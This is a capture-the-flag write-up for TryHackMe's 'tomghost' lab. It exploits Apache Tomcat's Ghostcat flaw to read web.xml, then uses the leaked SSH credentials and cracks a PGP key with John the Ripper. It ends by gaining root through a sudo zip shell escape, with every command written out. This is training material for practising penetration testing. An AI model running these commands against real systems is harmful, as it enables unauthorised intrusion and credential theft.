tomghost - TryHackMe

tomghost - TryHackMe

Identify recent vulnerabilities to try exploit the system or read files that you should not have access to.

Difficulty: Easy

Recognition

So we start by performing an nmap scan with the -A option that enables operating system detection, version detection, script analysis and traceroute.

$ nmap -A 10.10.52.86

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA) | 256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA) |_ 256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)

53/tcp open tcpwrapped

8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: |_ Supported methods: GET HEAD POST OPTIONS

8080/tcp open http Apache Tomcat 9.0.30 |_http-favicon: Apache Tomcat |_http-title: Apache Tomcat/9.0.30 |_http-open-proxy: Proxy might be redirecting requests Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So we notice on port 8009 an open service called ajp13 Considering the name of the machine, we will have to exploit a vulnerability of Apache Tomcat. With some research, we quickly come across the CVE-2020-1938 Ghostcat. . An exploit for this vulnerability is available on this Github

Apache Tomcat servers have a /WEB-INF/web.xml file by default. So we'll be looking to read that file with the exploit. So we'll be looking to read that file with the exploit.

$ python3 ajpShooter.py http://10.10.52.86:8080 8009 /WEB-INF/web.xml read

In this file, we find what seems to be an account :

Welcome to GhostCat skyfuck:[redacted]

We will try to connect with these identifiers to the server in SSH, and it works. Once connected, there are 2 files in the user's home directory: credential.pgp and tryhackme.asc.

  • credential.pgp is a binary file.
  • tryhackme.asc is a PGP private key.

1. Compromise this machine and obtain user.txt

To find the user.txt file, I don't complicate my life and I use the find command. Our rights allow us to read the file, so we can display the flag and validate it.

$ find / -type f -name "user.txt" 2>/dev/null /home/merlin/user.txt

$ cat /home/merlin/user.txt [redacted]

2. Escalate privileges and obtain root.txt

The private key previously found is surely not there by chance. So I decide to get it back on my computer.

$ scp skyfuck@10.10.52.86:/home/skyfuck/* .

Once recovered, we pass the key into John. To do this, we must first use the gpg2john tool.

$ gpg2john tryhackme.asc > gpgjohn

$ john --wordlist=/usr/share/wordlists/rockyou.txt gpgjohn [redacted]

So we get the password to decrypt the pgp file. We must first import the key.

$ gpg --import tryhackme.asc

We confirm with the password found before. Once imported, we can decrypt the pgp file.

$ gpg -d credential.pgp

gpg: Warning: the CAST5 encryption algorithm cannot be found in the recipient preferences

gpg: encrypted with a 1024-bit ELG key, identifier 61E104A66184FBCC, created on 2020-03-11

« tryhackme stuxnet@tryhackme.com »

merlin:[redacted]

Of course, with these credentials, you can open an SSH session.

The goal now is to get the contents of the root.txt file.

The first step is to check the sudo -l :

merlin@ubuntu:~$ sudo -l

Matching Defaults entries for merlin on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu: (root : root) NOPASSWD: /usr/bin/zip

So we can use the binary /usr/bin/zip as root. By making a small tour on GTFOBins, we realize that we have the possibility of raising our privileges. Following the procedure, we pass root and we can display the file root.txt.

merlin@ubuntu:~$ TF=$(mktemp -u) merlin@ubuntu:~$ sudo zip $TF /etc/hosts -T -TT 'sh #' adding: etc/hosts (deflated 31%)

#id uid=0(root) gid=0(root) groups=0(root)

#cat /root/root.txt THM{[redacted]}

Happy Hacking ! 🎉